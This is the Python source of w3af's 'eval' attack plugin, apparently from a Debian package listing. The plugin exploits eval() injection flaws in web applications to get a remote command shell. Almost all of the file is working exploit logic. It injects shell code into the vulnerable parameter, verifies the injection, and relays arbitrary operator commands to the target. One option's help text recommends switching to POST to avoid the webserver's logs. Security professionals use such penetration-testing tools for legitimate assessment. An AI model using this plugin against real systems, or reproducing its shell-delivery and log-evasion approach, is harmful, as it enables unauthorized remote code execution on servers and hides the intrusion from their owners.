/usr/share/w3af/plugins/attack/eval.py is in w3af-console 1.1svn5547-1.1.
This file is owned by root:root, with mode 0o644.
The actual contents of the file can be viewed below.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 | '''
eval.py
Copyright 2009 Andres Riancho
This file is part of w3af, w3af.sourceforge.net .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
'''
import core.controllers.outputManager as om
# options
from core.data.options.option import option
from core.data.options.optionList import optionList
from core.controllers.basePlugin.baseAttackPlugin import baseAttackPlugin
import core.data.kb.knowledgeBase as kb
from core.controllers.w3afException import w3afException
from core.data.parsers.urlParser import parse_qs
# Advanced shell stuff
from core.data.kb.exec_shell import exec_shell as exec_shell
import plugins.attack.payloads.shell_handler as shell_handler
from plugins.attack.payloads.decorators.exec_decorator import exec_debug
class eval(baseAttackPlugin):
'''
Exploit eval() vulnerabilities.
@author: Andres Riancho ( andres.riancho@gmail.com )
'''
def __init__(self):
baseAttackPlugin.__init__(self)
# Internal variables
self._shell_code = None
# User configured variables
self._changeToPost = True
self._url = ''
self._method = 'GET'
self._data = ''
self._inj_var = ''
self._generateOnlyOne = True
def fastExploit(self, url, method, data ):
'''
Exploits a web app with remote file include vuln.
@parameter url: A string containing the Url to exploit ( http://somehost.com/foo.php )
@parameter method: A string containing the method to send the data ( post / get )
@parameter data: A string containing data to send with a mark that defines
which is the vulnerable parameter ( aa=notMe&bb=almost&cc=[VULNERABLE] )
'''
return None
def getAttackType(self):
'''
@return: The type of exploit, SHELL, PROXY, etc.
'''
return 'shell'
def getVulnName2Exploit( self ):
'''
This method should return the vulnerability name (as saved in the kb) to exploit.
For example, if the audit.osCommanding plugin finds an vuln, and saves it as:
kb.kb.append( 'osCommanding' , 'osCommanding', vuln )
Then the exploit plugin that exploits osCommanding ( attack.osCommandingShell ) should
return 'osCommanding' in this method.
'''
return 'eval'
def _generateShell( self, vuln_obj ):
'''
@parameter vuln_obj: The vuln to exploit.
@return: A shell object based on the vuln that is passed as parameter.
'''
# Check if we really can execute commands on the remote server
if self._verify_vuln( vuln_obj ):
# Create the shell object
shell_obj = eval_shell( vuln_obj )
shell_obj.setUrlOpener( self._uri_opener )
shell_obj.set_cut( self._header_length, self._footer_length )
shell_obj.setCode( self._shell_code )
return shell_obj
else:
return None
def _verify_vuln( self, vuln_obj ):
'''
This command verifies a vuln. This is really hard work!
@parameter vuln_obj: The vulnerability to exploit.
@return : True if vuln can be exploited.
'''
# Get the shells
extension = vuln_obj.getURL().getExtension()
# I get a list of tuples with code and extension to use
shell_code_list = shell_handler.get_shell_code( extension )
for code, real_extension in shell_code_list:
# Prepare for exploitation...
function_reference = getattr( self._uri_opener , vuln_obj.getMethod() )
data_container = vuln_obj.getDc()
data_container[ vuln_obj.getVar() ] = code
try:
http_res = function_reference( vuln_obj.getURL(), str(data_container) )
except Exception:
continue
else:
cut_result = self._define_exact_cut( http_res.getBody(), shell_handler.SHELL_IDENTIFIER )
if cut_result:
self._shell_code = code
return True
# All failed!
return False
def getOptions( self ):
'''
@return: A list of option objects for this plugin.
'''
d0 = 'If the vulnerability was found in a GET request, try to change the method to POST'
d0 += ' during exploitation.'
h0 = 'If the vulnerability was found in a GET request, try to change the method to POST'
h0 += ' during exploitation; this is usefull for not being logged in the webserver logs.'
o0 = option('changeToPost', self._changeToPost, d0, 'boolean', help=h0)
d1 = 'URL to exploit with fastExploit()'
o1 = option('url', self._url, d1, 'url')
d2 = 'Method to use with fastExploit()'
o2 = option('method', self._method, d2, 'string')
d3 = 'Data to send with fastExploit()'
o3 = option('data', self._data, d3, 'string')
d4 = 'Variable where to inject with fastExploit()'
o4 = option('injvar', self._inj_var, d4, 'string')
d5 = 'Exploit only one vulnerability.'
o5 = option('generateOnlyOne', self._generateOnlyOne, d5, 'boolean')
ol = optionList()
ol.add(o0)
ol.add(o1)
ol.add(o2)
ol.add(o3)
ol.add(o4)
ol.add(o5)
return ol
def setOptions( self, optionsMap ):
'''
This method sets all the options that are configured using the user interface
generated by the framework using the result of getOptions().
@parameter optionsMap: A dict with the options for the plugin.
@return: No value is returned.
'''
self._changeToPost = optionsMap['changeToPost'].getValue()
self._url = optionsMap['url'].getValue()
self._method = optionsMap['method'].getValue()
self._data = parse_qs( optionsMap['data'].getValue() )
self._inj_var = optionsMap['injvar'].getValue()
self._generateOnlyOne = optionsMap['generateOnlyOne'].getValue()
def getRootProbability( self ):
'''
@return: This method returns the probability of getting a root shell using this attack plugin.
This is used by the "exploit *" function to order the plugins and first try to exploit the more critical ones.
This method should return 0 for an exploit that will never return a root shell, and 1 for an exploit that WILL ALWAYS
return a root shell.
'''
return 0.8
def getLongDesc( self ):
'''
@return: A DETAILED description of the plugin functions and features.
'''
return '''
This plugin exploits eval() vulnerabilities and returns a remote shell.
Six configurable parameters exist:
- changeToPost
- url
- method
- injvar
- data
- generateOnlyOne
'''
class eval_shell(exec_shell):
def setCode(self, code):
self._shell_code = code
@exec_debug
def execute( self, command ):
'''
This method executes a command in the remote operating system by
exploiting the vulnerability.
@parameter command: The command to handle ( ie. "ls", "whoami", etc ).
@return: The result of the command.
'''
# Lets send the command.
function_reference = getattr( self._uri_opener , self.getMethod() )
exploit_dc = self.getDc()
exploit_dc[ 'cmd' ] = command
exploit_dc[ self.getVar() ] = self._shell_code
try:
response = function_reference( self.getURL() , str(exploit_dc) )
except w3afException, e:
return 'Error "' + str(e) + '" while sending command to remote host. Please try again.'
else:
return self._cut( response.getBody() )
def end( self ):
'''
Finish execution, clean-up, clear the local web server.
'''
om.out.debug('eval() shell is cleaning up.')
def getName( self ):
return 'eval_shell'
|